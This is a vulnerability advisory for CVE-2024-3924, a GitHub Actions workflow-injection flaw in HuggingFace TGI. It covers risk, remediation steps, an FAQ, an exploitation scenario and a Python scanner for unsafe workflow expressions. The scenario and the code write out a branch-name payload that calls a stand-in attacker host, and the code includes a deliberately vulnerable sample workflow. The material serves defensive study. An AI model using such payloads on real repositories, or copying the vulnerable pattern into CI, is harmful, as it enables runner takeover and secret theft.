CVE-2024-3924: text-generation-inference: workflow injection RCE

Severity: UNKNOWN | CISA SSVC: Track*
Published May 30, 2024
CISO Take

A GitHub Actions workflow in HuggingFace TGI (`autodocs.yml`) interpolated the PR branch name (`github.head_ref`) unsanitized into a shell command, letting any external contributor execute arbitrary code on the CI runner simply by naming their branch as a payload. If your team maintains a fork of TGI, verify the fork contains fix commit 88702d8 and audit your own workflows for the same `github.head_ref` misuse; consumers of published releases are not exposed at runtime. The real risk is supply chain: depending on the workflow's trigger and permissions, a compromised runner can read whatever secrets the job is granted, inject malicious artifacts, or backdoor releases.

Risk Assessment

Risk is HIGH for maintainers of TGI and of any downstream fork that carries the same workflow. Exploitation requires only the ability to open a pull request from a fork; no repository write access is needed. The blast radius depends on which event triggers the workflow, which this page does not establish: under `pull_request_target` the job runs with the base repository's secrets and a write-capable `GITHUB_TOKEN`, so runner code execution becomes credential theft; under plain `pull_request` a fork's PR receives no secrets and a read-only token, and the attacker is limited to whatever that job itself produces (build output, caches, uploaded artifacts). For end-users who only consume published TGI releases, risk is indirect but real if the pipeline was used to poison a release artifact before the patch.

Severity & Risk

CVSS 3.1
N/A
EPSS
0.4%
chance of exploitation in 30 days
Higher than 59% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Recommended Action

5 steps
  1. Patch

    Ensure your checkout or fork contains fix commit 88702d8 (shipped in v2.0.0). Verify using git log --oneline | grep 88702d8 in your fork; a fork created before the fix carries the vulnerable workflow regardless of which TGI version it builds or pins.

  2. Audit workflows

    Grep all .github/workflows/*.yml files for ${{ github.head_ref }}, ${{ github.event.pull_request.head.ref }}, PR titles and bodies, commit messages, and similar user-controlled expressions used inside run: steps. Quoting makes no difference: the runner substitutes the value into the script before the shell parses it, so a command substitution in a branch name executes even inside double quotes.

  3. Replace with safe alternatives

    Keep the value out of the script text entirely: assign it to an environment variable in the step's env: block and reference that variable, double-quoted, in the run: script, so the shell receives it as data rather than as source. Use ${{ github.base_ref }} only where the base branch is genuinely what the step needs; it is not a substitute for the head ref.

  4. Restrict pull_request_target

    Limit what workflows triggered by external PRs can reach. Use pull_request (fork PRs get no secrets and a read-only GITHUB_TOKEN) instead of pull_request_target unless required; where pull_request_target is required, set a minimal permissions: block and do not check out or execute the PR's code in that job.

  5. Verify release integrity

    Check the SHA/digest of any TGI images or packages pulled before the fix commit landed against the official Hugging Face releases, to detect tampering during the window in which the workflow was exploitable.

CISA SSVC Assessment

Decision: Track*
Exploitation: poc
Automatable: no
Technical Impact: partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2 - AI system supply chain
NIST AI RMF
GOVERN 6.1 - AI risk in the supply chain
OWASP LLM Top 10
LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2024-3924?

A GitHub Actions workflow (`autodocs.yml`) in HuggingFace TGI interpolated the PR branch name (`github.head_ref`) directly into a shell command, so anyone able to open a pull request from a fork could execute arbitrary code on the CI runner by choosing a malicious branch name. It is a CI/supply-chain weakness in the repository, fixed in commit 88702d8 (v2.0.0), not a flaw in the TGI inference server itself.

Is CVE-2024-3924 actively exploited?

No confirmed in-the-wild exploitation of CVE-2024-3924 has been reported. CISA's SSVC record does list a public proof of concept, and the attack needs nothing more than a crafted branch name on a fork PR, so organizations should patch and audit their workflows proactively.

How to fix CVE-2024-3924?

Make sure your checkout or fork contains fix commit 88702d8 (v2.0.0); grep `.github/workflows/*.yml` for `${{ github.head_ref }}`, `${{ github.event.pull_request.head.ref }}` and similar PR-controlled expressions inside `run:` steps (quoting them does not help, the substitution happens before the shell runs); pass such values to the shell through `env:` instead; prefer `pull_request` over `pull_request_target` so fork PRs get no secrets; and verify the digests of TGI images and packages pulled before the fix against the official Hugging Face releases. The Recommended Action section above lists these five steps in detail.

What systems are affected by CVE-2024-3924?

The vulnerable code is the repository's CI workflow, not the inference server, so exposure is concentrated in CI/CD pipelines for AI frameworks: the upstream TGI repository, any fork that carries the same `autodocs.yml`, and organizations that build TGI from such a fork. LLM inference serving, model serving infrastructure and self-hosted TGI deployments are affected only indirectly, through artifacts produced by a compromised pipeline.

What is the CVSS score for CVE-2024-3924?

No CVSS score has been assigned yet.

Technical Details

NVD Description

A code injection vulnerability exists in the huggingface/text-generation-inference repository, specifically within the `autodocs.yml` workflow file. The vulnerability arises from the insecure handling of the `github.head_ref` user input, which is used to dynamically construct a command for installing a software package. An attacker can exploit this by forking the repository, creating a branch with a malicious payload as the name, and then opening a pull request to the base repository. Successful exploitation could lead to arbitrary code execution within the context of the GitHub Actions runner. This issue affects versions up to and including v2.0.0 and was fixed in version 2.0.0.

Exploitation Scenario

An adversary targeting an organization's LLM inference supply chain forks `huggingface/text-generation-inference` and creates a branch whose name is shell, for example `$(curl${IFS}-s${IFS}attacker.example/beacon)`. Git refnames cannot contain spaces or colons, so `${IFS}` stands in for the separators and the URL carries no scheme; `$`, parentheses and braces are all legal. They open a pull request from this branch to the upstream repository. The `autodocs.yml` workflow runs on the PR and builds a package-install command by substituting the raw branch name; the runner performs that substitution before the shell starts, so the branch name is parsed as part of the script and the command substitution executes in the runner context. What that buys the attacker depends on the trigger. Under `pull_request_target` the job holds the base repository's secrets and a write-capable `GITHUB_TOKEN`, which the payload can post out (secrets exposed through `env:` sit in the process environment; `GITHUB_TOKEN` itself is only an environment variable if the workflow exports it). With stolen registry or signing credentials the attacker can publish a trojanized TGI build that propagates to every deployment that auto-updates. Under a plain `pull_request` trigger a fork's PR gets no secrets and a read-only token, and the damage is confined to that job's own outputs.
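The audit in step 2 of Recommended Action and the substitution-before-shell mechanics of the scenario above, as an added example that is not part of this page or of the TGI project: a line-based scanner for PR-controlled expressions inside `run:` steps, exercised on two constructed workflows (a vulnerable shape modelled on what the advisory describes and its hardened form, neither being the real `autodocs.yml`), plus a helper that renders the shell line exactly as the runner would hand it to bash. The host `attacker.example`, the sample workflows, the payload and all function names are constructed for the illustration.

```python
"""Audit GitHub Actions workflows for the CVE-2024-3924 pattern: a value an
external PR author controls, interpolated straight into a `run:` step.
Added example for this page, not TGI project tooling. The workflows, the
host attacker.example and the payload below are constructed, not the real
autodocs.yml."""
import re
from dataclasses import dataclass
from typing import Iterator, List, Optional, Tuple

# Contexts an external PR author can set, per GitHub's script-injection guidance.
ATTACKER_CONTROLLED = re.compile(
    r"\$\{\{[^}]*\b(github\.head_ref"
    r"|github\.event\.pull_request\.(title|body|head\.(ref|label)|head\.repo\.\w+)"
    r"|github\.event\.(issue|comment|review|review_comment)\.(title|body)"
    r"|github\.event\.(head_commit\.message|commits\[[^\]]*\]\.message))\b[^}]*\}\}")
# Triggers that run a fork's PR with the base repo's secrets and a writable
# GITHUB_TOKEN. Heuristic: the word anywhere in the file counts.
PRIVILEGED_TRIGGER = re.compile(r"\b(pull_request_target|issue_comment|workflow_run)\b")
RUN_KEY = re.compile(r"^(\s*)(-\s+)?run:\s*(.*)$")
EXPRESSION = re.compile(r"\$\{\{\s*([\w.\[\]]+)\s*\}\}")


@dataclass(frozen=True)
class Finding:
    file: str
    line: int                          # 1-based line in the workflow
    expression: str                    # the offending ${{ ... }}
    privileged_trigger: Optional[str]  # None: fork PRs get no secrets here


def run_step_lines(text: str) -> Iterator[Tuple[int, str]]:
    """Yield (line number, content) for each line of a `run:` value, inline or
    `|`/`>` block scalar, without a YAML parser (line-based heuristic)."""
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        m = RUN_KEY.match(lines[i])
        i += 1
        if not m:
            continue
        key_indent = len(m.group(1)) + len(m.group(2) or "")
        rest = m.group(3)
        if rest[:1] not in ("|", ">"):
            yield i, rest
            continue
        # Block scalar: continues while lines are blank or indented past the key.
        while i < len(lines) and not (
                lines[i].strip() and len(lines[i]) - len(lines[i].lstrip()) <= key_indent):
            yield i + 1, lines[i]
            i += 1


def scan_workflow(text: str, name: str = "<inline>") -> List[Finding]:
    """Flag every attacker-controlled expression inside a run step; feed it
    Path(...).read_text() for each file under .github/workflows (step 2)."""
    trig = PRIVILEGED_TRIGGER.search(text)
    return [Finding(name, lineno, m.group(0), trig.group(1) if trig else None)
            for lineno, content in run_step_lines(text)
            for m in ATTACKER_CONTROLLED.finditer(content)]


def expand_expressions(script: str, context: dict) -> str:
    """What the runner does before bash starts: textual substitution. The shell
    never sees `${{ }}`, only its value, so quoting the expression cannot help."""
    return EXPRESSION.sub(lambda m: str(context.get(m.group(1), "")), script)


# Constructed vulnerable sample: the branch name lands in the shell and the
# privileged trigger hands the job secrets.
VULNERABLE_WORKFLOW = """\
name: autodocs
on:
  pull_request_target:
jobs:
  docs:
    steps:
      - name: Install package from PR branch
        run: pip install "git+https://github.com/${{ github.repository }}.git@${{ github.head_ref }}"
"""
# Hardened form: the value reaches the shell only via an environment variable,
# which bash expands as data, under the unprivileged pull_request trigger.
HARDENED_WORKFLOW = """\
name: autodocs
on:
  pull_request:
jobs:
  docs:
    steps:
      - name: Install package from PR branch
        env:
          HEAD_REF: ${{ github.head_ref }}
        run: |
          pip install "git+https://github.com/${{ github.repository }}.git@${HEAD_REF}"
"""
# Constructed payload. Git refnames allow no spaces or colons, so ${IFS}
# separates words and the URL has no scheme; $ ( ) { } are all legal.
PAYLOAD_BRANCH = "$(curl${IFS}-s${IFS}attacker.example/beacon)"


def expanded_vulnerable_command(branch: str) -> str:
    """The vulnerable step's shell line as the runner hands it to bash: the
    branch becomes a $( ) inside double quotes, which bash executes."""
    run_line = next(content for _, content in run_step_lines(VULNERABLE_WORKFLOW))
    return expand_expressions(run_line, {"github.repository": "huggingface/text-generation-inference",
                                         "github.head_ref": branch})
```

`scan_workflow` reports one finding for the vulnerable sample (line 8, `${{ github.head_ref }}`, privileged trigger `pull_request_target`) and none for the hardened one, because the expression there sits under `env:` rather than in the script. A finding with a privileged trigger is the case where runner execution reaches secrets; a finding under plain `pull_request` still means an external PR runs arbitrary commands in your job. The scanner is a heuristic: it does not parse YAML, does not follow `uses:` into composite actions, and treats any mention of a privileged trigger name as the trigger being declared.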

Weaknesses (CWE)

Timeline

Published
May 30, 2024
Last Modified
November 21, 2024
First Seen
May 30, 2024

Related Vulnerabilities